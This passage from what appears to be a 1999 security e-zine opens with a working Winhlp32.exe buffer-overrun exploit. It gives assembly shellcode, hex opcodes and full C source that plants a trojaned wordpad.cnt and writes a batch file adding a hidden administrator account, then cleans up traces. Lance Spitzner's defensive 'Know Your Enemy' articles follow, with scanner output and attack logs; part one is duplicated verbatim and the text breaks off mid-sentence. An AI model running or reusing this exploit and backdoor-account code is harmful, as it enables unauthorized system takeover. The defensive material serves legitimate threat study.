we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The
following code calls exit (0)
/* Procedure prologue */
push ebp
mov ebp,esp
/* Round about way of getting address of exit () into edx */
mov edx,0xFFFFFFFF
sub edx,0x87FFAF65
/* Push this address onto the stack */
push edx
/* Get some nulls - this is our exit code - and push them too */
xor eax,eax
push eax
/* then call exit()! */
call dword ptr[ebp-04h]
Altogether our code looks like this:
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0x77F1381A
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr [ebp-04h],43h
mov byte ptr [ebp-03h],4Dh
mov byte ptr [ebp-02h],44h
mov eax, 0x7801E1E1
push eax
lea eax,[ebp-04h]
push eax
call dword ptr [ebp-08h]
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFA445
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
Now we need the operayion codes (opcodes) for all this which we do by
writing a program that uses the __asm function and then debug it. This is
what we actually load into our exploit code.
Following is the source of a program that will create a "trojaned"
wordpad.cnt. It will also create a batch file called add.bat - edit it as
you see fit. I have compiled the program - you can get a copy of it from
http://www.infowar.co.uk/mnemonix/winhlpadd.exe
Note that this will run only on standard installs of NT with service pack 4
and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help
directory.
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com
#include
#include
#include
int main(void)
{
char eip[5]="\xE5\x27\xF3\x77";
char
ExploitCode[200]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x
45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\x
C6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\x
F1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x
41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\x
FF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *fd;
printf("\n\n*******************************************************\n");
printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
printf("* This version runs on Service Pack 4 machines and *\n");
printf("* assumes a msvcrt.dll version of 4.00.6201 *\n");
printf("* *\n");
printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n");
printf("*******************************************************\n\n");
fd = fopen("wordpad.cnt", "r");
if (fd==NULL)
{
printf("\n\nWordpad.cnt not found or insufficient rights to access
it.\nRun this from the WINNT\\HELP directory");
return 0;
}
fclose(fd);
printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
system("copy wordpad.cnt wordpad.sav");
printf("\n\nCreating wordpad.cnt with exploit code...");
fd = fopen("wordpad.cnt", "w+");
if (fd==NULL)
{
printf("Failed to open wordpad.cnt in write mode. Check you have
sufficent rights\n");
return 0;
}
fprintf(fd,"1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n",eip,ExploitCode)
;
fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n");
fclose(fd);
printf("\nCreating batch file add.bat\n\n");
fd = fopen("add.bat", "w");
if (fd == NULL)
{
printf("Couldn't create batch file. Manually create one instead");
return 0;
}
printf("The batch file will attempt to create a user account called
\"winhlp\" and\n");
printf("with a password of \"winhlp!!\" and add it to the Local
Administrators group.\n");
printf("Once this is done it will reset the files and delete itself.\n");
fprintf(fd,"net user winhlp winhlp!! /add\n");
fprintf(fd,"net localgroup administrators winhlp /add\n");
fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
fprintf(fd,"del wordpad.sav\n");
fprintf(fd,"del add.bat\n");
fclose(fd);
printf("\nBatch file created.");
printf("\n\nCreated. Now open up Wordpad and click on Help\n");
return 0;
}
@HWA
09.0 NAI ON GALADRIEL VIRUS
~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 22nd May 1999 on 12.18 pm CET
Couple of days ago we wrote about Galadriel virus. This virus infects files with the
CSC extension when an infected script is run from under CorelDraw and Corel Photo
Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many
scripts stop executing properly when infected and a CorelDraw error message will
occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite
uses a different language than the Corel script. NAI categorized this virus as Low risk,
and you could update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0
@HWA
10.0 Know your enemy parts 1,2 and 3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Part 1
The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999
My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
common and universal threats, the Script Kiddie.
Who is the Script Kiddie
The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
the entire Internet for that exploit. Sooner or later they find someone vulnerable.
Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a
common strategy, randomly search for a specific weakness, then exploit that weakness.
The Threat
It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and
networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when
they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
were scanned by a script kiddie who happened to be sweeping that network block.
If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed,
anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows
no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
The Methodology
The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of
the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily
determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be
used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly
scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
liable.
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of
having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
scanned recently does not mean you are secure.
The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
the Internet. For more information on this, check out Know Your Enemy: III.
These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
The Tools
The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to
build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single
option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP
database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million
IPs by scanning the entire .com or .edu domain.
Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools
exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better
understanding of how these tools are used, check out Know Your Enemy: II.
How to Protect Against This Threat
There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are
looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
one of the best sources of information.
Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a
service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or
Armoring NT.
As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
find at http://www.isc.org/bind.html.
Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
threats to your network and react to these threats.
Conclusion
The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
against this threat.
NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
Whitepapers / Publications
The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999
My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
common and universal threats, the Script Kiddie.
Who is the Script Kiddie
The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
the entire Internet for that exploit. Sooner or later they find someone vulnerable.
Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a
common strategy, randomly search for a specific weakness, then exploit that weakness.
The Threat
It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and
networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when
they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
were scanned by a script kiddie who happened to be sweeping that network block.
If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed,
anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows
no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
The Methodology
The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of
the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily
determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be
used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly
scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
liable.
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of
having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
scanned recently does not mean you are secure.
The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
the Internet. For more information on this, check out Know Your Enemy: III.
These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
The Tools
The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to
build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single
option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP
database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million
IPs by scanning the entire .com or .edu domain.
Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools
exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better
understanding of how these tools are used, check out Know Your Enemy: II.
How to Protect Against This Threat
There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are
looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
one of the best sources of information.
Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a
service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or
Armoring NT.
As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
find at http://www.isc.org/bind.html.
Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
threats to your network and react to these threats.
Conclusion
The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
against this threat.
NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
Part 2
Tracking their moves
Know Your Enemy: II
Lance Spitzner
Last Modified: May 23, 1999
In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically,
how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in
the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot
determine, with your system logs. You may be able to determine if you are being probed, what you were being
probed for, what tools were used, and if they successful. The examples provided here focus on Linux, but can
apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step.
However, this article is a good place to start.
Securing Your Logs
This article is not on Intrusion Detection, there are a variety of excellent sources that cover IDS. If you are interested in
intrusion detection, I recommend checking out applicatons such as Network Flight Recorder or swatch. This article focuses
on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be
surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we
first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first
thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their
presence from log files (such as cloak), or alter logging all together (such as trojaned syslogd binaries). So, the first step to
reviewing your logs is securing your logs.
This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a
compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping you hard drive clean.
This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both
locally and to a remote log server. I recommend making your log server a dedicated system, ie. the only thing it should be
doing is collecting logs from other systems.. If money is an issue, you can easily build a linux box to act as your log server.
This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an
example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server
from receiving bad or un-authorized logging information from the Internet.
For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such
as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing
the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both
locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file,
/etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the
blackhat from realizing the true destination of our remote logging. Another option for your systems is to use a secure method of
logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of
options. One option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html
Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of
the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source,
it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source.
The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You
can determine if the local logs have been altered by comparing them to the remote logs.
Pattern Matching
By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network
for a single vulnerability. If your logs show most of your systems being connected from the same remote system, on the same
port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your
network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed be default. So, we
would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by
launching inetd with the "-t" flag., facility daemon. A typical exploit scan would look like something below. Here we have a
source scanning for the wu-ftpd vulnerability.
/var/log/secure
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200
Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is
not always the case). This is the advantage of having a log server, you can more easily identify patterns in your network since
all the logs are combined. The repeated connections to port 21, ftp, indicated they were most likely looking for the wu-ftpd
exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release
code for an imap exploit, you will suddenly see a rush of imaps scans in your logs.
The next month you will be hit by ftp. An
excellent source for current exploits is http://www.cert.org/advisories/ Sometimes, tools will scan for a variety of exploits at
the same time, so you may see a single source connecting to several ports.
Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc
connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers.
For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the
connections (see Intrusion Detection for more info on this).
What's the Tool?
Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a
specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely
using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses,
the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two
"categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the
results :)
sscan represents the "all purpose" Script Kiddie scanning tool, and its probably one of the best ones out there. It quickly
probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes
for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user
must be root to use it. The output is extremely easy to interpret (hence making it so popular): It gives a concise
summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in
the output, and then run the "exploit du jour". Below is an example of sscan ran against the system mozart
(172.17.6.30).
otto #./sscan -o 172.17.6.30
--------------------------<[ * report for host mozart *
<[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
--<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *
Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist, rather, it tells you what ports are
open, you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason.
It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection,
various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking
skills to use the tool and interpret the data. Below is an example of nmap ran against the same system.
otto #nmap -sS -O 172.17.6.30
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
53 open tcp domain
70 open tcp gopher
79 open tcp finger
80 open tcp http
109 open tcp pop-2
110 open tcp pop-3
111 open tcp sunrpc
143 open tcp imap2
513 open tcp login
514 open tcp shell
635 open tcp unknown
2049 open tcp nfs
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand
how the tools work. First, an sscan will log in as follows (this is a default scan with no modifications to any config files):
/var/log/secure
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200
/var/log/maillog
Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=???
host=[192.168.11.200]
Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=???
host=[192.168.11.200]
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root
/var/log/messages
Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or
wide character
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. I
decided to included them anyway for your edification :)
/var/log/httpd/access_log
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl
HTTP/1.0" 404 187
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163
Notice how a complete connection was made for all the ports(SYN, SYN-ACK, ACK) then torn down. That is because
sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but
what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool
commonly used to sniff passwords.
mozart $ cat 172.17.6.30.21-192.168.11.200.7238
220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT
1998) ready.
As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the
complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are
making a complete connection to determine what you are running.
Nmap, like most port scanners, does not care what you are running, but if you are running specific services. For this, nmap
has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc.
For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these
options, your logs will be different based on the options selected by the remote user. A connection made with the -sT flag is a
complete connection, so the logs will like similar to sscan, however by default nmap scans more ports.
/var/log/secure
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200
One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You
may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to
determine which of the 15 was the actual source. More often, users will select the -sS flag for port scanning. This is a
stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a
